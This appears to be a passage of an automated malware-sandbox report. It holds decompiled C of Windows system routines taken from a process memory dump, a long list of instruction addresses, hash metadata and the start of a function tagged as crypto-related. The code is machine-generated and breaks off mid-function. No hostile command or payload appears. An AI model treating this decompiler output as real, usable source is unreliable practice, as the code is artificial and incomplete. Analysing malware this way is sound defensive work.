														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0162F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0162F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0162F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0162FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0162FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0162F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0162F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E016B4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0163D130(_t427, _t494, _t511);
				}
			}










































































                                                0x016b5ba5
                                                0x016b5baa
                                                0x016b5baf
                                                0x016b5bb4
                                                0x016b5bb6
                                                0x016b5bbc
                                                0x016b5bbe
                                                0x016b5bc4
                                                0x016b5bcd
                                                0x016b5bd3
                                                0x016b5bd6
                                                0x016b5bdc
                                                0x016b5be0
                                                0x016b5be3
                                                0x016b5beb
                                                0x016b5bf2
                                                0x016b5bf8
                                                0x016b5bfe
                                                0x016b5c04
                                                0x016b5c0e
                                                0x016b5c18
                                                0x016b5c1f
                                                0x016b5c25
                                                0x016b5c2a
                                                0x016b5c2c
                                                0x016b5c32
                                                0x016b5c3a
                                                0x016b5c3f
                                                0x016b5c42
                                                0x016b5c48
                                                0x016b5c5b
                                                0x016b5c5b
                                                0x016b5c2c
                                                0x016b5cb7
                                                0x016b5cb9
                                                0x016b5cbf
                                                0x016b5cc2
                                                0x016b5cca
                                                0x016b5ccb
                                                0x016b5ccb
                                                0x016b5cd1
                                                0x016b5cd7
                                                0x016b5cda
                                                0x016b5ce1
                                                0x016b5ce4
                                                0x016b5ce7
                                                0x016b5ced
                                                0x016b5cf3
                                                0x016b5cf9
                                                0x016b5cff
                                                0x016b5d08
                                                0x016b5d0a
                                                0x016b5d0e
                                                0x016b5d10
                                                0x00000000
                                                0x00000000
                                                0x016b5d16
                                                0x016b5d1a
                                                0x00000000
                                                0x00000000
                                                0x016b5d20
                                                0x016b5d22
                                                0x016b5d25
                                                0x016b5d2f
                                                0x016b5d2f
                                                0x016b5d33
                                                0x016b5d3d
                                                0x016b5d49
                                                0x016b5d4b
                                                0x00000000
                                                0x00000000
                                                0x016b5d5a
                                                0x016b5d5d
                                                0x016b5d60
                                                0x00000000
                                                0x00000000
                                                0x016b5d66
                                                0x016b5d69
                                                0x00000000
                                                0x00000000
                                                0x016b5d6f
                                                0x016b5d6f
                                                0x016b5d73
                                                0x016b5d79
                                                0x016b5d7f
                                                0x016b5d86
                                                0x016b5d95
                                                0x016b5d98
                                                0x016b5dba
                                                0x016b5dcb
                                                0x016b5dce
                                                0x016b5dd3
                                                0x016b5dd6
                                                0x016b5dd8
                                                0x016b5de6
                                                0x016b5dec
                                                0x016b5dee
                                                0x016b5df1
                                                0x016b5df3
                                                0x016b635a
                                                0x016b635a
                                                0x00000000
                                                0x016b635a
                                                0x016b5dfe
                                                0x016b5e02
                                                0x016b5e05
                                                0x016b5e07
                                                0x016b5e10
                                                0x016b5e13
                                                0x016b5e1b
                                                0x016b5e1c
                                                0x016b5e21
                                                0x016b5e22
                                                0x016b5e23
                                                0x016b5e25
                                                0x016b5e2a
                                                0x016b5e2c
                                                0x016b5e2e
                                                0x016b5e36
                                                0x016b5e39
                                                0x016b5e42
                                                0x016b5e47
                                                0x016b5e4d
                                                0x016b5e54
                                                0x016b5e54
                                                0x016b5e54
                                                0x016b5e2e
                                                0x016b5e5c
                                                0x016b5e5f
                                                0x016b5e62
                                                0x016b5e64
                                                0x016b5e6b
                                                0x016b5e70
                                                0x016b5e7a
                                                0x016b5e7a
                                                0x016b5e7a
                                                0x016b5e6b
                                                0x016b5e7e
                                                0x016b5e7f
                                                0x016b5e7f
                                                0x016b5e81
                                                0x016b5e87
                                                0x016b5e8b
                                                0x016b5e8c
                                                0x016b5e8c
                                                0x016b5e8c
                                                0x016b5e9a
                                                0x016b5e9c
                                                0x016b5ea2
                                                0x016b5ea6
                                                0x016b5f50
                                                0x016b5f50
                                                0x016b5f57
                                                0x016b5f66
                                                0x016b5f66
                                                0x016b5f66
                                                0x016b5f68
                                                0x016b5f6a
                                                0x016b63d0
                                                0x00000000
                                                0x016b5f70
                                                0x016b5f70
                                                0x016b5f91
                                                0x016b5f9c
                                                0x016b5f9e
                                                0x016b5fa4
                                                0x016b5fa6
                                                0x016b638c
                                                0x016b6392
                                                0x016b63a1
                                                0x016b63a7
                                                0x016b63af
                                                0x016b63af
                                                0x016b63bd
                                                0x016b63d8
                                                0x00000000
                                                0x016b63d8
                                                0x016b5fac
                                                0x016b5fb2
                                                0x016b5fb4
                                                0x016b5fbd
                                                0x016b5fc6
                                                0x016b5fce
                                                0x016b5fd4
                                                0x016b5fdc
                                                0x016b5fec
                                                0x016b5fed
                                                0x016b5fee
                                                0x016b5fef
                                                0x016b5ff9
                                                0x016b5ffa
                                                0x016b5ffb
                                                0x016b5ffc
                                                0x016b6000
                                                0x016b6004
                                                0x016b6012
                                                0x016b6012
                                                0x016b6018
                                                0x016b6019
                                                0x016b601a
                                                0x016b601b
                                                0x016b601c
                                                0x016b6020
                                                0x016b6059
                                                0x016b605c
                                                0x016b6061
                                                0x016b6061
                                                0x016b6022
                                                0x016b6022
                                                0x016b6022
                                                0x016b6025
                                                0x016b602a
                                                0x016b602b
                                                0x016b6031
                                                0x016b6037
                                                0x016b6038
                                                0x016b603e
                                                0x016b6048
                                                0x016b6049
                                                0x016b604a
                                                0x016b604b
                                                0x016b604c
                                                0x016b604d
                                                0x016b6053
                                                0x016b6054
                                                0x016b6054
                                                0x016b6062
                                                0x016b6065
                                                0x016b6067
                                                0x016b606a
                                                0x016b6070
                                                0x016b6075
                                                0x016b6076
                                                0x016b6081
                                                0x016b6087
                                                0x016b6095
                                                0x016b6099
                                                0x016b609e
                                                0x016b60a4
                                                0x016b60ae
                                                0x016b60b0
                                                0x016b60b3
                                                0x016b60b6
                                                0x016b60b8
                                                0x016b60ba
                                                0x016b60ba
                                                0x016b60ba
                                                0x016b60ba
                                                0x016b60be
                                                0x016b60c0
                                                0x016b60c5
                                                0x016b60c5
                                                0x016b60c5
                                                0x016b60c6
                                                0x016b60cd
                                                0x016b6114
                                                0x016b60cf
                                                0x016b60cf
                                                0x016b60d4
                                                0x016b60d5
                                                0x016b60da
                                                0x016b60db
                                                0x016b60e1
                                                0x016b60e2
                                                0x016b60e8
                                                0x016b60f8
                                                0x016b60fd
                                                0x016b60fe
                                                0x016b6102
                                                0x016b6104
                                                0x016b6107
                                                0x016b6109
                                                0x016b610b
                                                0x016b610b
                                                0x016b610b
                                                0x016b610b
                                                0x016b610f
                                                0x016b610f
                                                0x016b6117
                                                0x016b611a
                                                0x016b611f
                                                0x016b6125
                                                0x016b6134
                                                0x016b6139
                                                0x016b613f
                                                0x016b6146
                                                0x016b6148
                                                0x016b614b
                                                0x016b614d
                                                0x016b614f
                                                0x016b614f
                                                0x016b614f
                                                0x016b614f
                                                0x016b6153
                                                0x016b6159
                                                0x016b6159
                                                0x016b615c
                                                0x016b6163
                                                0x016b6169
                                                0x016b616c
                                                0x016b6172
                                                0x016b6181
                                                0x016b6186
                                                0x016b6187
                                                0x016b618b
                                                0x016b6191
                                                0x016b6195
                                                0x016b61a3
                                                0x016b61bb
                                                0x016b61c0
                                                0x016b61c3
                                                0x016b61cc
                                                0x016b61d0
                                                0x016b61dc
                                                0x016b61de
                                                0x016b61e1
                                                0x016b61e4
                                                0x016b61e6
                                                0x016b61e8
                                                0x016b61e8
                                                0x016b61e8
                                                0x016b61e8
                                                0x016b61e6
                                                0x016b61ec
                                                0x016b61f3
                                                0x016b6203
                                                0x016b6209
                                                0x016b620a
                                                0x016b6216
                                                0x016b621d
                                                0x016b6227
                                                0x016b6241
                                                0x016b6246
                                                0x016b624c
                                                0x016b6257
                                                0x016b6259
                                                0x016b625c
                                                0x016b625e
                                                0x016b6260
                                                0x016b6260
                                                0x016b6260
                                                0x016b6260
                                                0x016b625e
                                                0x016b6264
                                                0x016b6267
                                                0x016b6269
                                                0x016b6315
                                                0x016b6315
                                                0x016b631b
                                                0x016b631e
                                                0x016b6324
                                                0x016b6327
                                                0x016b632f
                                                0x016b6330
                                                0x016b6333
                                                0x016b633a
                                                0x016b633c
                                                0x016b6335
                                                0x016b6335
                                                0x016b6335
                                                0x016b633f
                                                0x016b6342
                                                0x016b634c
                                                0x016b6352
                                                0x016b6355
                                                0x016b6355
                                                0x016b6359
                                                0x00000000
                                                0x016b626f
                                                0x016b6275
                                                0x016b6275
                                                0x016b6278
                                                0x016b627e
                                                0x016b627e
                                                0x016b6281
                                                0x016b6287
                                                0x016b628d
                                                0x016b6298
                                                0x016b629c
                                                0x016b62a2
                                                0x016b629e
                                                0x016b629e
                                                0x016b629e
                                                0x016b62a7
                                                0x016b62a7
                                                0x016b62aa
                                                0x016b62b0
                                                0x016b62f0
                                                0x016b62f0
                                                0x016b62f2
                                                0x016b62f8
                                                0x016b62fd
                                                0x016b62b2
                                                0x016b62b2
                                                0x016b62b2
                                                0x016b62b5
                                                0x016b62dd
                                                0x016b62e2
                                                0x016b62e5
                                                0x016b62b7
                                                0x016b62b8
                                                0x016b62bb
                                                0x016b62bd
                                                0x016b62c0
                                                0x016b62c4
                                                0x016b62cd
                                                0x016b62cd
                                                0x016b62c0
                                                0x016b62bb
                                                0x016b62b5
                                                0x016b6302
                                                0x016b6303
                                                0x016b6305
                                                0x016b6305
                                                0x016b6305
                                                0x016b630c
                                                0x016b630c
                                                0x00000000
                                                0x016b627e
                                                0x016b6269
                                                0x016b5eac
                                                0x016b5ebb
                                                0x016b5ebe
                                                0x016b5ecb
                                                0x016b5ecb
                                                0x016b5ece
                                                0x016b5ece
                                                0x016b5ed4
                                                0x016b5ed7
                                                0x016b5ed9
                                                0x016b5edb
                                                0x016b5edb
                                                0x016b5ee1
                                                0x016b5ee1
                                                0x016b5ee3
                                                0x016b5f20
                                                0x016b5f20
                                                0x016b5ee5
                                                0x016b5ee5
                                                0x016b5ee5
                                                0x016b5ee8
                                                0x016b5f11
                                                0x016b5f18
                                                0x016b5eea
                                                0x016b5eea
                                                0x016b5eed
                                                0x016b5ef2
                                                0x016b5ef8
                                                0x016b5efb
                                                0x016b5f0a
                                                0x016b5f0a
                                                0x016b5eed
                                                0x016b5ee8
                                                0x016b5f22
                                                0x016b5f28
                                                0x00000000
                                                0x00000000
                                                0x016b5f30
                                                0x016b5f31
                                                0x016b5f37
                                                0x016b5f3a
                                                0x016b5f3d
                                                0x016b5f44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016b5f46
                                                0x016b5f48
                                                0x016b5f4d
                                                0x00000000
                                                0x016b5f4d
                                                0x016b5dda
                                                0x016b5ddf
                                                0x00000000
                                                0x016b5ddf
                                                0x016b5dd8
                                                0x016b5da7
                                                0x016b5da9
                                                0x016b5dac
                                                0x016b5dae
                                                0x00000000
                                                0x016b5db4
                                                0x016b5db4
                                                0x00000000
                                                0x016b5db4
                                                0x016b5dae
                                                0x016b5d88
                                                0x016b5d8d
                                                0x016b6363
                                                0x016b6369
                                                0x016b636a
                                                0x016b6370
                                                0x016b6372
                                                0x016b637a
                                                0x016b637b
                                                0x016b637d
                                                0x00000000
                                                0x00000000
                                                0x016b637f
                                                0x016b6385
                                                0x00000000
                                                0x016b6385
                                                0x016b5d38
                                                0x016b5d3b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016b5d3b
                                                0x016b5d27
                                                0x016b5d29
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016b6360
                                                0x00000000
                                                0x016b6360
                                                0x016b5c10
                                                0x016b5c10
                                                0x016b63da
                                                0x016b63e5
                                                0x016b63e5

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 818cf56e5a56b98165a00beb0c7a9d877f9498ca27d870094492a0c662ee14a2
                                                • Instruction ID: c3c0dfba0cdf280b52dc7f928f0ef976fd13d65e968bc33eed87f9ea9a0ed8c5
                                                • Opcode Fuzzy Hash: 818cf56e5a56b98165a00beb0c7a9d877f9498ca27d870094492a0c662ee14a2
                                                • Instruction Fuzzy Hash: 094237759012298FDB24CF68CD80BE9BBB1FF49304F1481AAD94DAB342D7749985CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01604120, Relevance: .4, Instructions: 444COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E01604120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x16dd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0161F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01606E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01604620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01606E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M016045F8))) {
												case 0:
													_v568 = 0x15c1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x15c11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01604620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0162F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0162F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
